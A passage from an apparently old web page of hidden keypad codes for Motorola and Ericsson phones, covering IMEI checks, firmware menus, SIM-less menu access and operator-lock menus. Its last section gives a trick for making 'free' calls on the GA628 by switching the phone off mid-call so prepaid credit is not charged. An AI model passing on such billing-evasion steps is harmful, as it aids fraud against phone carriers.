Option' is displayed, press [OK], select 'Active Cell',
press [OK], press [MENU] until 'C1' appears. This is the
signal quality. If it becomes negative for longer than 5
seconds, a new cell is selected.





Motorola V3688
---------------



#06# for checking the IMEI (International Mobile Equipment Identity)

Enhanced Full Rate Codec (EFR):

To Enable EFR press [][][] 119 [] 1 [] OK.
To Disable EFR press [][][] 119 [] 0 [] OK

NOTE: Nothing appears on Screen.





Ericsson Mobile Secret Codes:


T10

*#06# for checking the IMEI (International Mobile Equipment Identity)

>*<<*<* for checking the firmware revision information (software release)

>*<<*<*>> n-row text strings. if pressing yes you can check the phones text programming in

currently selected language.

Shortcut for Last Dialed call menu

If you for some reason don't want to enter the 'Last Dialed calls menu' by using the 'YES'

key you can use the following key
stroke instead: First '0' then '#'.

Access menu without Sim card

To access to the menu in your phone without having a card inside do the following: type

**04*0000*0000*0000# When display say "Wrong Pin" press NO and you have access to the all

menus: Info, Access, Settings, Calculator, Clock, Keylock On?, Mail, Phone book. NOTE if

you try this on your phone may stop at Keylock On? menu and you´ll have to take your

battery out to turn the phone on again. And this will not care about Phone lock!

A way to (un)lock your cell phone on to the network(subset):
1. Press <**<
2. Then on the display appear and give you two choices: Lock to Network ? and Lock to

Network subset? (Use arrow keys to select)
3. Enter the NCK number (code is provided by the SP)
4. You have 5 attemps to do this
5. Then your cell phone will work 'only' with the network

Warning: The Service Provider (SP) Lock menu is used to lock the cell phone to the SP's SIM

card. Once the cell phone is locked to a specific operator, if one inserts a SIM card from

a different operator the phone will refuse to accept it! The cell phone will however accept

another SIM card from the same operator. To activate/deactivate this lock one needs a

special secret code that is not available to the end user. Your phone can be locked to a

service provider FOREVER by doing this! If an invalid code is entered all five times, the

menu will exit and be deactivated! Any further attempt to activate the NCK/NSCK lock Menu

will result in the response "Not allowed"! However the NCK/NSCK lock can be recover through

a direct clearing in the EEPROM.

Message Report

When you writing a message, place at the start of it the code *0# and continue with your

message. It's job is like nokias report. It gives you information about the sended message.

T18

*#06# for checking the IMEI (International Mobile Equipment Identity) Information you get

from the IMEI:

XXXXXX XX XXXXXX X

TAC FAC SNR SP

TAC = Type approval code
FAC = Final assembly code
SNR = Serial number
SP = Spare

To access SIM-Locking menu of your phone, press: < * [CLR] <
Be careful or you may lock your phone.

Message Report

When you writing a message, place at the start of it the code *0# and continue with your

message. It's job is like nokias report. It gives you information about the sended message.

T28

*#06# for checking the IMEI (International Mobile Equipment Identity)

>*<<*<* for checking the firmware revision information (software release)

>*<<*<*> 1-row text strings. if pressing yes you can check the phones text programming in

currently selected language.

>*<<*<*>> n-row text strings. if pressing yes you can check the phones text programming in

currently selected language.

The Service Provider (SP) Lock

The Service Provider (SP) Lock menu is used to lock the cell phone to the SP's SIM card.

Once the cell phone is locked to a specific operator, if one inserts a SIM card from a

different operator the phone will refuse to accept it! The cell phone will however accept

another SIM card from the same operator.

To activate/deactivate this lock one needs a special secret code that is not available to

the end user.

Here is how to activate the menu:

<**< Lock to Network? if pressing yes you have 5 attempts to enter NCK.

<**<< Lock to Network subset? if pressing yes you have 5 attempts to enter NSCK.

Warning: Your phone can be locked to a service provider FOREVER by doing this! If an

invalid code is entered all five times, the menu will exit and be deactivated! Any further

attempt to activate the NCK/NSCK lock Menu will result in the response "Not allowed"!

However the NCK/NSCK lock can be recover through a direct clearing in the EEPROM.

Shortcut for Last Dialed call menu

If you for some reason don't want to enter the 'Last Dialed calls menu' by using the 'YES'

key you can use the following key
stroke instead: First '0' then '#'.

Message Report

When you are writing a message, place at the start of it the code *0# and continue with

your message. It's job is like nokias report. It gives you information about the sended

message.



388

*#06# for checking the IMEI (International Mobile Equipment Identity)

*#0000# to reset the phones menu-language to English.

>*<<*<* for checking the firmware revision information (software release)

>*<<*<*> 1-row text strings. if pressing yes you can check the phones text programming in

currently selected language.(298 entries)

>*<<*<*>> n-row text strings. if pressing yes you can check the phones text programming in

currently selected language.(160 entries?)

The Service Provider (SP) Lock menu is used to lock the cell phone to the SP's SIM card.

Once the cell phone is locked to a specific operator, if one inserts a SIM card from a

different operator the phone will refuse to accept it! The cell phone will however accept

another SIM card from the same operator.

To activate/deactivate this lock one needs a special secret code that is not available to

the end user. (not even to you... or is it ? in case please let me know!)

<**< Lock to Network? if pressing yes you have 5 attempts to enter NCK.

<**<< Lock to Network subset? if pressing yes you have 5 attempts to enter NSCK.

Warning: Your phone can be locked to a service provider FOREVER by doing this! If an

invalid code is entered all five times,the menu will exit and be deactivated! Any further

attempt to activate the NCK/NSCK lock Menu will result in the response "Not allowed"!

However the NCK/NSCK lock can be recover through a direct clearing in the EEPROM.

Shortcut for Last Dialed call menu...

If you for some reason don't want to enter the 'Last Dialed calls menu' by using the 'YES'

key you can use the following key
stroke instead: First '0' then '#'.

Access menu without Sim card ...

To access to the menu in your phone without having a card inside do the following: type

**04*0000*0000*0000# When display say "Wrong Pin" press NO and you have access to the all

menus: Info, Access, Settings, Calculator, Clock, Keylock On?,Mail, Phone book. NOTE if you

try this on the GH688 your phone may stop at Keylock On? menu and you´ll have to take your

battery out to turn the phone on again.

GA628

*#06# for checking the IMEI (International Mobile Equipment Identity)

*#0000# to reset the phones menu-language to English.

*#103# then YES Time and date will be shown.

>*<<*<* for checking the firmware revision information (software release)

>*<<*<*> 1-row text strings. if pressing yes you can check the phones text programming in

currently selected language.(298 entries)

>*<<*<*>> n-row text strings. if pressing yes you can check the phones text programming in

currently selected language.(160 entries?)

The Service Provider (SP) Lock

The Service Provider (SP) Lock menu is used to lock the cell phone to the SP's SIM card.

Once the cell phone is locked to a specific operator, if one inserts a SIM card from a

different operator the phone will refuse to accept it! The cell phone will however accept

another SIM card from the same operator.

To activate/deactivate this lock one needs a special secret code that is not available to

the end user.

Here is how to activate the menu:

<**< Lock to Network? if pressing yes you have 5 attempts to enter NCK.

<**<< Lock to Network subset? if pressing yes you have 5 attempts to enter NSCK.

Warning: Your phone can be locked to a service provider FOREVER by doing this! If an

invalid code is entered all five times,the menu will exit and be deactivated! Any further

attempt to activate the NCK/NSCK lock Menu will result in the response "Not allowed"!

However the NCK/NSCK lock can be recover through a direct clearing in the EEPROM.

Shortcut for Last Dialed call menu

If you for some reason don't want to enter the 'Last Dialed calls menu' by using the 'YES'

key you can use the following key
stroke instead: First '0' then '#'.

Bat. level indicator when turned OFF

When the phone is turned off and the phone is not changing - the bat. level can be seen for

a short period of time by pressing the 'NO' key quick once (it has to be quick!) and then

wait for about 2 sec. The bat. level will now be shown in the display at its normal

position.

Access menu without Sim card

To access to the menu in your phone without having a card inside do the following: type

**04*0000*0000*0000# When display say "Wrong Pin" press NO and you have access to the all

menus: Info, Access, Settings, Calculator, Clock, Keylock On?,Mail, Phone book. NOTE if you

try this on your phone may stop at Keylock On? menu and you´ll have to take your battery

out to turn the phone on again.

Alarm Clock Menu

Go to MissedCall Empty the list Press the -> key for a second or two The option Menu size

turns up Choose 'yes' and go from there.

An alarm clock turned up too but it never rang. I think this was because there is no clock

in the phone.

Free phone calls using the GA628

This trick has only been reported working on PREPAID GSM CARDS and in some countries and

with some sw versions.
The prepaid GSM SIM CARD is a kind of "SIM card" which only has a sertant amount of credit

on it (like a normal phonebox telecard)... if it can be traced? - we don't know...

Well..here's the trick you dial the no. normally and press YES. While "connecting" is shown

on the screen, the following procedure should be carried out: Press CLR then 0 then # and

then NO (twice) so as to switch OFF the phone. You can then still speak on the phone while

it is switched off but the SIM card does not record your calls which will lead to FREE

phone calls in some countries.. we hope!!

Another variant of the code

Make a Call, while the phone says Connecting type 083# (the position 83 must be empty! ),

when phone says Pos Emtpy, press the NO key and turn off the phone.

If you can make the call with the phone turned off you will face a problem when you need to

hang up the phone...the only way for you to do that is remove the battery...???

Related Posts Plugin for WordPress, Blogger...
Twitter Delicious Facebook Digg Stumbleupon Favorites More